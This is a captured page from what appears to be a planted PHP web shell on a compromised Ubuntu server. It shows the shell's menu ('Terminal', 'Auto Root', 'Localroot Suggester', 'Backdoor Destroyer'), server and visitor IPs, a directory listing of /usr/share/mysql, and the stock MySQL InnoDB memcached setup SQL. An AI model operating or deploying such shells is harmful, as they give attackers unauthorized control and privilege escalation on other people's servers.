Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
mysql /
Delete
Unzip
Name
Size
Permission
Date
Action
bulgarian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
charsets
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
czech
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
danish
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
docs
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
dutch
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
english
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
estonian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
french
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
german
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
greek
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
hungarian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
italian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
japanese
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
korean
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
norwegian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
norwegian-ny
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
polish
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
portuguese
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
romanian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
russian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
serbian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
slovak
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
spanish
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
swedish
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
ukrainian
[ DIR ]
drwxr-xr-x
2021-02-02 07:34
debian_create_root_user.sql
1.79
KB
-rw-r--r--
2021-01-28 17:21
dictionary.txt
24.98
KB
-rw-r--r--
2020-12-10 04:01
echo_stderr
27
B
-rwxr-xr-x
2021-01-28 17:21
errmsg-utf8.txt
517.76
KB
-rw-r--r--
2020-12-10 04:01
fill_help_tables.sql
1.02
MB
-rw-r--r--
2020-12-10 04:13
innodb_memcached_config.sql
3.91
KB
-rw-r--r--
2020-12-10 04:01
install_rewriter.sql
2.18
KB
-rw-r--r--
2021-01-28 16:56
magic
773
B
-rw-r--r--
2020-12-10 04:01
mysql-log-rotate
844
B
-rw-r--r--
2021-01-28 16:56
mysql-systemd-start
1.49
KB
-rwxr-xr-x
2017-02-06 12:53
mysql_security_commands.sql
2.13
KB
-rw-r--r--
2020-12-10 04:01
mysql_sys_schema.sql
281.6
KB
-rw-r--r--
2020-12-10 04:01
mysql_system_tables.sql
151.42
KB
-rw-r--r--
2020-12-10 04:01
mysql_system_tables_data.sql
1.21
KB
-rw-r--r--
2020-12-10 04:01
mysql_test_data_timezone.sql
10.58
KB
-rw-r--r--
2020-12-10 04:01
mysqld_multi.server
1.04
KB
-rwxr-xr-x
2021-01-28 16:56
uninstall_rewriter.sql
1.23
KB
-rw-r--r--
2021-01-28 16:56
Save
Rename
create database innodb_memcache; use innodb_memcache; -- ------------------------------------------------------------------------ -- Following are set of "configuration tables" that used to configure -- the InnoDB Memcached. -- ------------------------------------------------------------------------ -- ------------------------------------------------------------------------ -- Table `cache_policies` -- -- Each record in this table represents a named caching policy, specifying: -- * How the memcache GET command is executed, including whether to get -- records from local cache only, from InnoDB only, from local cache if -- present (treating InnoDB as a backing store), or not at all. -- * Similarly, how memcache SET commands are executed. -- * How memcache DELETE commands are executed. -- * Whether flushing the cache should cause a mass delete from NDB. -- -- ------------------------------------------------------------------------ CREATE TABLE IF NOT EXISTS `cache_policies` ( `policy_name` VARCHAR(40) PRIMARY KEY, `get_policy` ENUM('innodb_only', 'cache_only', 'caching','disabled') NOT NULL , `set_policy` ENUM('innodb_only', 'cache_only','caching','disabled') NOT NULL , `delete_policy` ENUM('innodb_only', 'cache_only', 'caching','disabled') NOT NULL, `flush_policy` ENUM('innodb_only', 'cache_only', 'caching','disabled') NOT NULL ) ENGINE = innodb; -- ------------------------------------------------------------------------ -- Table `containers` -- -- A container record describes an InnoDB table used for data storage by -- InnoDB Memcache. -- There must be a unique index on the `key column`, and unique index name -- is specified in the `unique_idx_name_on_key` column of the table -- `value_columns` are comma-separated lists of the columns that make up -- the memcache key and value. Each column width is defined such that they -- are in consistent with NDB memcached. -- ------------------------------------------------------------------------ CREATE TABLE IF NOT EXISTS `containers` ( `name` varchar(50) not null primary key, `db_schema` VARCHAR(250) NOT NULL, `db_table` VARCHAR(250) NOT NULL, `key_columns` VARCHAR(250) NOT NULL, `value_columns` VARCHAR(250), `flags` VARCHAR(250) NOT NULL DEFAULT "0", `cas_column` VARCHAR(250), `expire_time_column` VARCHAR(250), `unique_idx_name_on_key` VARCHAR(250) NOT NULL ) ENGINE = InnoDB; CREATE TABLE IF NOT EXISTS `config_options` ( `name` varchar(50) not null primary key, `value` varchar(50)) ENGINE = InnoDB; -- ------------------------------------------------------------------------ -- This is an example -- We create a InnoDB table `demo_test` is the `test` database -- and insert an entry into contrainers' table to tell InnoDB Memcache -- that we has such InnoDB table as back store: -- c1 -> key -- c2 -> value -- c3 -> flags -- c4 -> cas -- c5 -> exp time -- PRIMARY -> use primary key to search -- ------------------------------------------------------------------------ INSERT INTO containers VALUES ("aaa", "test", "demo_test", "c1", "c2", "c3", "c4", "c5", "PRIMARY"); INSERT INTO cache_policies VALUES("cache_policy", "innodb_only", "innodb_only", "innodb_only", "innodb_only"); INSERT INTO config_options VALUES("separator", "|"); INSERT INTO config_options VALUES("table_map_delimiter", "."); CREATE DATABASE IF NOT EXISTS test; USE test -- ------------------------------------------------------------------------ -- Key (c1) must be VARCHAR or CHAR type, memcached supports key up to 255 -- Bytes -- Value (c2) must be VARCHAR or CHAR type -- Flag (c3) is a 32 bits integer -- CAS (c4) is a 64 bits integer, per memcached define -- Exp (c5) is again a 32 bits integer -- ------------------------------------------------------------------------ CREATE TABLE demo_test (c1 VARCHAR(32), c2 VARCHAR(1024), c3 INT, c4 BIGINT UNSIGNED, c5 INT, primary key(c1)) ENGINE = INNODB; INSERT INTO demo_test VALUES ("AA", "HELLO, HELLO", 8, 0, 0);